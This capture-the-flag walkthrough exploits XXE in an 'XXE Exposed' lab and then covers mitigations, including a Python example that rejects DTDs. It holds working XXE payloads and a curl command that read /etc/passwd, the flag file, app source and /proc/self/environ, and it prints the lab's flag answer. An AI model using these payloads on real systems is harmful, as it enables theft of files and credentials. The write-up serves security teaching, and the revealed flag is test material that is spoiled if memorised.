Challenge stats: 1 flag, 5 points, 60% success rate.
This solution is for Flags Mode

This walkthrough explains how to hack the lab and capture the flags. For help with Learning Mode questions, use the Request Hint button next to each question.

XXE Exposed - Complete Solution Walkthrough

Understanding XXE Vulnerabilities

XML External Entity (XXE) attacks exploit vulnerable XML parsers that process external entity references. This challenge features a corporate XML document parser with a critical XXE vulnerability that allows file disclosure attacks through external entity injection.

Step 1: Initial Reconnaissance

  1. Access the challenge: Navigate to <target-ip>:80 to view the challenge presentation page
  2. Identify the XML parser service: The vulnerable XML document parser runs on <target-ip>:8080
  3. Test basic functionality: Use the provided sample XML on the interface to understand how the parser works
  4. Analyze response structure: Observe that the parser processes XML and returns parsed content with detailed output

Step 2: Understanding the Parser Implementation

The vulnerable parser implementation uses:

  • xmllint with --noent flag: --noent tells xmllint to substitute entity references with their replacement text, so a SYSTEM entity pointing at a file is fetched and inlined into the output, which is what makes the parser vulnerable to XXE
  • Flask endpoint /parse: Accepts POST requests with XML data
  • No input sanitization: The parser processes XML without filtering dangerous constructs
  • File system access: The application has read permissions on the server filesystem

Step 3: Testing for XXE Vulnerability

  1. Create a basic XXE test payload: Start by testing external entity processing with a common system file
  2. Test payload for /etc/passwd:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document [
<!ENTITY xxe SYSTEM "file:///etc/passwd">
]>
<document>
<title>XXE Test</title>
<content>&xxe;</content>
</document>
  3. Submit the test payload: Use the web interface at <target-ip>:8080 or send a POST request to /parse
  4. Verify XXE functionality: If successful, you should see /etc/passwd contents in the parsed output, confirming the XXE vulnerability

Step 4: Locating the Flag File

Based on the challenge structure and common CTF patterns, the flag is located at /home/flag.txt. This is confirmed by:

  • Challenge hint: The flag is in the home directory (/home)
  • Application setup: The Flask app creates the flag file at /home/flag.txt during initialization
  • File permissions: The application has read access to this location

Step 5: Crafting the Flag Extraction Payload

  1. Create the XXE payload to read the flag:
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE document [
<!ENTITY flag SYSTEM "file:///home/flag.txt">
]>
<document>
<title>Flag Retrieval</title>
<content>&flag;</content>
</document>
  2. Execution methods:
    • Web Interface: Paste the payload into the XML input field and click "Parse Document"
    • Command Line: Use curl to send the payload directly:
curl -X POST -H "Content-Type: application/xml" \
-d '<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE document [<!ENTITY flag SYSTEM "file:///home/flag.txt">]><document><title>Flag Retrieval</title><content>&flag;</content></document>' \
<target-ip>:8080/parse

Step 6: Flag Extraction Success

  1. Successful XXE execution: The vulnerable xmllint parser resolves the external entity and reads the flag file
  2. Parser output analysis: The flag content appears in the parsed document output
  3. Flag retrieved:
6d995aed-e420-4c06-9191-02513421c1a9

Step 7: Advanced XXE Techniques

For further exploration and learning, you can test additional XXE vectors:

  1. System reconnaissance:
<!-- Read application source code -->
<!ENTITY app SYSTEM "file:///app/app.py">

<!-- Read system hosts file -->
<!ENTITY hosts SYSTEM "file:///etc/hosts">

<!-- Read environment variables -->
<!ENTITY env SYSTEM "file:///proc/self/environ">

<!-- Read process information -->
<!ENTITY cmdline SYSTEM "file:///proc/self/cmdline">
  2. Parameter entities: For more complex attacks where direct entity references might be filtered
  3. Out-of-band XXE: When direct response reading is not possible

Technical Analysis of the Vulnerability

  • Root Cause: Use of xmllint with the --noent flag, which substitutes external entities with the content they reference
  • Attack Vector: SYSTEM entity references in DOCTYPE declarations
  • Impact: Complete file system disclosure within application permissions
  • Processing Flow: XML → temp file → xmllint --noent → resolved XML → content extraction
  • No Validation: No filtering of dangerous XML constructs or entity references

Security Implications and Real-World Impact

  • Data Disclosure: XXE can expose sensitive files, configuration data, and credentials
  • SSRF Attacks: External entities can be used to make requests to internal services
  • Denial of Service: Billion laughs attacks and recursive entity expansion
  • Remote Code Execution: In some configurations, XXE can lead to RCE
  • Business Impact: Potential for complete data breach and system compromise

Prevention and Mitigation Strategies

  • Disable External Entities: Configure XML parsers to reject external entity processing
  • Input Validation: Implement strict XML input validation and sanitization
  • Secure Parser Configuration: Use XML libraries with secure defaults
  • Principle of Least Privilege: Run applications with minimal file system access
  • Web Application Firewall: Deploy WAF rules to detect XXE attack patterns
  • Regular Security Testing: Include XXE testing in security assessments
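The first three mitigations above, applied to the /parse step described in Step 2: instead of writing the submission to a temp file and running xmllint --noent over it, the service can refuse any document that carries a DTD before it is parsed at all. The following is an added example written for this walkthrough, not the lab's Flask code. It uses only the Python standard library (expat handlers plus xml.etree), the sample documents inside it are constructed, and the function names (assert_no_dtd, parse_untrusted, screen) are this example's own.

```python
"""Hardened stand-in for the /parse step: refuse any DTD before parsing.

Added example, not the lab's own code. Standard library only; the sample
documents at the bottom are constructed for illustration.
"""
import xml.etree.ElementTree as ET
import xml.parsers.expat


class UnsafeXMLError(ValueError):
    """Raised when a document declares a DOCTYPE or any entity."""


def _forbid(*_handler_args):
    # Every XXE payload on this page needs a <!DOCTYPE ... [<!ENTITY ...>]>
    # block, so the cheapest mitigation is to refuse the DTD outright
    # instead of trying to filter "dangerous" entity bodies.
    raise UnsafeXMLError("DTD and entity declarations are not accepted")


def assert_no_dtd(data: bytes) -> None:
    """Run expat over the document with handlers that abort on any DTD.

    Doing this inside the XML tokenizer (rather than with a regex) means a
    DOCTYPE in UTF-16 or split across lines is still caught.
    """
    parser = xml.parsers.expat.ParserCreate()
    parser.StartDoctypeDeclHandler = _forbid    # <!DOCTYPE ...>
    parser.EntityDeclHandler = _forbid          # <!ENTITY ...>, general or parameter
    parser.ExternalEntityRefHandler = _forbid   # any attempt to fetch a SYSTEM/PUBLIC id
    try:
        parser.Parse(data, True)
    except xml.parsers.expat.ExpatError as exc:
        raise ValueError(f"malformed XML: {exc}") from exc


def parse_untrusted(data: bytes) -> ET.Element:
    """Parse caller-supplied XML only after the DTD check passes."""
    assert_no_dtd(data)
    return ET.fromstring(data)


def screen(data: bytes) -> str:
    """Classify a submission the way a hardened /parse endpoint would.

    Returns 'accepted', 'rejected: dtd' or 'rejected: malformed'; the
    verdict is also the right thing to log for detection purposes.
    """
    try:
        parse_untrusted(data)
    except UnsafeXMLError:
        return "rejected: dtd"
    except (ValueError, ET.ParseError):
        return "rejected: malformed"
    return "accepted"


# Constructed sample inputs (not captured from the lab).
BENIGN_DOC = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b"<document><title>Quarterly report</title><content>All good</content></document>"
)
XXE_DOC = (
    b'<?xml version="1.0" encoding="UTF-8"?>'
    b'<!DOCTYPE document [<!ENTITY xxe SYSTEM "file:///etc/passwd">]>'
    b"<document><title>XXE Test</title><content>&xxe;</content></document>"
)
# Same payload re-encoded as UTF-16 (with BOM): a byte search for b"<!DOCTYPE"
# never matches it, but expat still sees the DOCTYPE.
XXE_DOC_UTF16 = (
    XXE_DOC.replace(b'encoding="UTF-8"', b'encoding="UTF-16"')
    .decode("ascii")
    .encode("utf-16")
)

if __name__ == "__main__":
    for name, doc in [("benign", BENIGN_DOC), ("xxe", XXE_DOC), ("xxe utf-16", XXE_DOC_UTF16)]:
        print(f"{name:12s} -> {screen(doc)}")
```

Refusing the DOCTYPE wholesale covers every payload on this page, the parameter-entity and out-of-band variants included, because all of them need a DTD to declare the entity; doing the check in the tokenizer rather than with a regex also catches the same payload when it arrives in another encoding. In a deployed service the `screen()` verdict is what the endpoint returns to the client and writes to its log.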

Tools and Testing Methodology

  • Burp Suite: Professional tool for intercepting and modifying XML requests
  • OWASP ZAP: Free security testing proxy with XXE detection capabilities
  • curl/wget: Command-line tools for testing XXE payloads
  • XXE Payloads: Curated collections of XXE test vectors and payloads
  • Automated Scanners: Tools that automatically detect XXE vulnerabilities